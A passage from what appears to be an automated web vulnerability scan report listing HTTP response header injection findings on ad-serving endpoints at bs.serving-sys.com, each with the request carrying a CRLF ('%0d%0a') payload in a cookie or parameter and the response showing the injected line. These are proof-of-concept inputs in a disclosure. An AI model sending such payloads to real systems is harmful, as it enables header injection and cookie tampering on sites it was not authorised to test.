The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload fb682%0d%0aeb8d44f6d4b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0fb682%0d%0aeb8d44f6d4b; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0fb682
eb8d44f6d4b
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Connection: close


2.2. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the Pos request parameter is copied into the Set-Cookie response header. The payload 25305%0d%0ad8582cf193d was submitted in the Pos parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1923520&Page=&PluID=0&Pos=8190\25305%0d%0ad8582cf193d HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 01:45:49 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Content-type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fxqw9WTZ06IX0000820wsd; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lD00820wsd; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0v36820wsd0000010_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0v3602.V820wsd; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0aPa820ws3084ow80ws508Y5g410s308.I820wrF09KD820wrZ066N820wrV0aVX820wsd06Bz820wrm02Edo41wsd07l0820wrU077Tg20wr+02WGSdzosb0a4cg410rM07fto20ws50abMm5xos503sYg410sd06IXPAaesd04gILHW+s603Mo820wrG09EZ820ws30apK820wrU0bKd820ws507SK820wrM04uwg210rm05sM820wsc0bnAwy8ys509KL820wrB09bwg210s9; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8190\25305
d8582cf193d
=4069024
Location: http://ds.serving-sys.com/BurstingRes/Site-4111/Type-0/18067f96-5173-40dd-a87f-a59be8ff9a67.jpg
Content-Length: 0


2.3. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 671ca%0d%0a4758775fddb was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0671ca%0d%0a4758775fddb; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0671ca
4758775fddb
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 12 Dec 2010 01:21:26 GMT
Connection: close


2.4. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3d26%0d%0a75b00643908 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3d26%0d%0a75b00643908; F1=00UilH0003sY9QVZ; B2=; u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG070; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb06IXPy9Ksd09EZ820ws303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; C3=; u3=1; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=ae1f471a-36f2-482f-a2a3-bdda364895283FG07g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3d26
75b00643908
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 12 Dec 2010 01:21:26 GMT
Connection: close


2.5. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 5ab67%0d%0a00ff500b54 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=5ab67%0d%0a00ff500b54&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=9ca81172-a4f9-4b02-a394-c19b5012ea3a3FG020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=9ca81172-a4f9-4b02-a394-c19b5012ea3a3FG020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=5ab67
00ff500b54
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Connection: close


2.6. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 8e592%0d%0a9007e5dc7c was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=0&res=8e592%0d%0a9007e5dc7c HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=728dadae-3bec-4f91-b6b9-fc4877cb45893FG070; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=728dadae-3bec-4f91-b6b9-fc4877cb45893FG070; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=8e592
9007e5dc7c
&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 12 Dec 2010 01:38:10 GMT
Connection: close
Content-Length: 0


2.7. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 1cada%0d%0a5d5c234479e was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=1cada%0d%0a5d5c234479e&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Origin: http://www.informationweek.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=c4577373-5414-4b00-8af7-9b6cbe5f25ec3FG020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=c4577373-5414-4b00-8af7-9b6cbe5f25ec3FG020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=1cada
5d5c234479e
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 12 Dec 2010 01:38:10 GMT
Connection: close
Content-Length: 0


2.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload bf34f%0d%0aa00cfe1a23b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1923520&PluID=0&w=728&h=90&ncu=$$http://adserver.adtechus.com/adlink/5242/1200641/0/225/AdId=1240998;BnId=1;itime=112079296;key=global_cio+/blog/main/archives/global_cio/index;nodecode=yes;link=$$&ord=112079296&ucm=true&z=0 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: F1=00UilH0003sY9QVZ; ActivityInfo=0008uqbh0%5f000g3dbdR%5f; eyeblaster=BWVal=68&BWDate=40523.459491&debuglevel=&FLV=10.1103&RES=128&WMPV=0bf34f%0d%0aa00cfe1a23b; A2=fZeI9WKQ0aVX0000820wsdfLYa9Unv04gI9Unfm5xos6ec+d9T.v084o0000820ws5fpvP9T.n0bKd0000820ws5e2F69Wy302Ed0000820wscdvkb9VvC03sY0000820ws9bOpn9S+m084o0000g410s2fdr39RxG077T0000820wr+fxqw9Te706IX0000jAVes3fWFs9Wax02WG0000g410sbfGw99Wym05sM0000820wscfG6y9T.y09bw0000820ws5fFUO9R6Q09KD0000820wrZe8Pq9PnD0apK0000820wrUe.Ea9T.o07ft0000820ws5fn3P9MHm0a4c0000820wrMfFSg9Vrh09bw0000820ws9eicB9PMC066N0000820wrVe.AM9Rx102WG0000820wr+fIU99Tea08Y50000820ws3eWk99QTI02WG0000820wrYbOp09S+m084o0000820ws2fIxi9Te909EZ0000820ws3eewU9WSb02Ed0000g210sdfUPP9Way02WG9WaySdzosbd2A59T.n0abM9T.ve3wUs5fWDu9Wax02WG9Wayu7xUsbdsy29WKQ03sY0000820wsdePYM9Pla07l00000820wrUd2A69T.n0abM0000820ws5f8Tq9T.v0bnA00008y8ys5f8gM9QTI02WG9QTJe3wUrYfITd9Te708Y50000820ws3fxp89Rw+06IX0000820wr+fxp99Rw.06IX0000w820r+fnfJ9MZe07ft0000820wrNeOls9MZc07ft0000820wrNfWU49Unu04gI0000rCVKs6fWFP9Way02WG0000o61wsbekRN9Tj.0aPa0000820ws3; B2=7hRc0820wsc7vpr0820wrZ7kAl0820ws56zOA0820ws94VLS0820wrM49Zx0820wrG7M.D0820ws37MyX0Sdzosb7dNR0820wrY6+aF0g210sd7dNS0e3wUrY7MyY0u7xUsb78.q1820ws36Y5t0820wrU5.170820ws27grM08y8ys57MyZ0Ea2wsb7PGx0820wsd7HDq0820ws97c1A1820ws36SKC0g20wr+7d1H0o61wrM7c7l0820wrN7Pfd0rCVKs66ZCh0820ws55svs0820wrU7lD00jAVes37HIh0820ws57ycg0820wrN6qCb0m5xos56eKX0820wsc6zKo0820wsd7ygY0820ws57sx.0Ea2wr+7dOp0820wr+71af0820ws37IkP0m5xos65.190g410s27hMh0g410rM704G0820wrV; C3=0uP4Sdzosb0008w01_0lN6820wrG0000004_0t3m820wrm0000004_0ppC820wrU000000g_0sufm5xos50000002_0uyM820wrN0000001_0rWHo41wsd000001w_0sJz820wsd00000g0_0rCe820wrm0000002_0nCJ820wrM000000g_0u4d820ws50000040_0vq9820ws50000001_0vsV820wrN0000001_0oLK820wrB000000g_0o2A820wre000000w_0uv28y8ys50000001_0tITg20wr+00000w0_0ub+820wrF0000001_0q+Y820wrU0000040_0nez820wrV0000010_0viV820ws30000010_0v36PAVes30000090_0ugT820ws3000000w_0vaTLHW+s60000008_0uUv820wsc0000004_0uwbg410s30000102_0vjkg210s90000i00_0sNYg410sd0000820_0uXig410rM0000002_0u72o61wrM0000004_0r9+o61ws20000001_0vlN820wrZ0000001_0t8k820ws50000200_; D3=0uUv00W1820wsc0v3602.VjAVes30vaT00EMLHW+s60uP400ai820wr+0r9+04E.o61ws20rWH02A.820wsc0rWH02.Vg210sd0sJz00wJ820wsd0sNY00wJ820wsd0vq905Zw820ws50oLK00Hs820wrB0vjk004H820ws50uwb02.V820ws30vlN04od820wrZ0vjk03j6820ws90q+Y07jq820wrU0t8k005D820ws50uP4021RSdzosb0v3602KuEa2wr+0lN600w1820wrG0u7202Rfo61wrM0nCJ02bP820wrM0suf02efm5xos50tIT02fxg20wr+0uXi00Y3g410rM0ub+01Cq820wrF0uyM005D820wrN0sNY00b1820ws90uP400dDm5xorY0o2A03sH820wre0viV00Mm820ws30ugT00tR820ws30t3m0053820wrm0u4d05Gc820ws50uwb00Mm820ws30rCe0053820wrm0nez01B9820wrV0vsV00as820wrN0ppC007X820wrU0uv201xc8y8ys5; E2=0aPa820ws3084ow80ws509KD820wrZ08.I820wrF08Y5g410s3066N820wrV02Edo41wsd06Bz820wrm0aVX820wsd07l0820wrU077Tg20wr+03sYg410sd0abMm5xos507fto20ws50a4cg410rM02WGSdzosb09EZ820ws306IXPAVes303Mo820wrG04gILHW+s60apK820wrU0bKd820ws504uwg210rm07SK820wrM0bnAwy8ys505sM820wsc09bwg210s909KL820wrB; u2=9a418881-221a-422b-8c26-d094f1df3ebf3Ey04g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=68&BWDate=40523.459491&debuglevel=&FLV=10.1103&RES=128&WMPV=0bf34f
a00cfe1a23b
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=e2F69Wy302Ed0000820wscfpvP9T.n0bKd0000820ws5ec+d9T.v084o0000820ws5fLYa9Unv04gI9Unfm5xos6fZeI9WKQ0aVX0000820wsdfWFs9Wax02WG0000g410sbfxqw9Te706IX0000jAVes3fdr39RxG077T0000820wr+bOpn9S+m084o0000g410s2dvkb9VvC03sY0000820ws9fxqx9WTS06IX0000820wsdfFUO9R6Q09KD0000820wrZfG6y9T.y09bw0000820ws5fGw99Wym05sM0000820wsce.Ea9T.o07ft0000820ws5e8Pq9PnD0apK0000820wrUe.AM9Rx102WG0000820wr+eicB9PMC066N0000820wrVfFSg9Vrh09bw0000820ws9fIxi9Te909EZ0000820ws3bOp09S+m084o0000820ws2eWk99QTI02WG0000820wrYfIU99Tea08Y50000820ws3dsy29WKQ03sY0000820wsdfWDu9Wax02WG9Wayu7xUsbd2A59T.n0abM9T.ve3wUs5fUPP9Way02WG9WaySdzosbeewU9WSb02Ed0000g210sdd2A69T.n0abM0000820ws5ePYM9Pla07l00000820wrUf8Tq9T.v0bnA00008y8ys5f8gM9QTI02WG9QTJe3wUrYfxp89Rw+06IX0000820wr+fITd9Te708Y50000820ws3fWFP9Way02WG0000o61wsbfWU49Unu04gI0000rCVKs6eOls9MZc07ft0000820wrNfnfJ9MZe07ft0000820wrNfxp99Rw.06IX0000w820r+ekRN9Tj.0aPa0000820ws3; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=6zOA0820ws97kAl0820ws57vpr0820wrZ7hRc0820wsc4VLS0820wrM49Zx0820wrG7M.D0820ws37dNR0820wrY7MyX0Sdzosb7MyY0u7xUsb7dNS0e3wUrY6+aF0g210sd7MyZ0Ea2wsb7grM08y8ys55.170820ws26Y5t0820wrU78.q1820ws37HDq0820ws97PGx0820wsd7Pfd0rCVKs67c7l0820wrN7d1H0o61wrM6SKC0g20wr+7c1A1820ws37lD00ry1Ksd5svs0820wrU6ZCh0820ws57ycg0820wrN7HIh0820ws56qCb0m5xos56zKo0820wsd6eKX0820wsc71af0820ws37dOp0820wr+7sx.0Ea2wr+7ygY0820ws57hMh0g410rM5.190g410s27IkP0m5xos6704G0820wrV; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ppC820wrU000000g_0t3m820wrm0000004_0lN6820wrG0000004_0uP4Sdzosb0008w01_0uyM820wrN0000001_0sufm5xos50000002_0rCe820wrm0000002_0sJz820wsd00000g0_0rWHo41wsd000001w_0nCJ820wrM000000g_0o2A820wre000000w_0oLK820wrB000000g_0vsV820wrN0000001_0vq9820ws50000001_0u4d820ws50000040_0uv28y8ys50000001_0ub+820wrF0000001_0tITg20wr+00000w0_0q+Y820wrU0000040_0viV820ws30000010_0nez820wrV0000010_0v36Py1Ksd0000090_0vaTLHW+s60000008_0ugT820ws3000000w_0uwbg410s30000102_0uUv820wsc0000004_0vjkg210s90000i00_0sNYg410sd0000820_0r9+o61ws20000001_0u72o61wrM0000004_0uXig410rM0000002_0t8k820ws50000200_0vlN820wrZ0000001_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
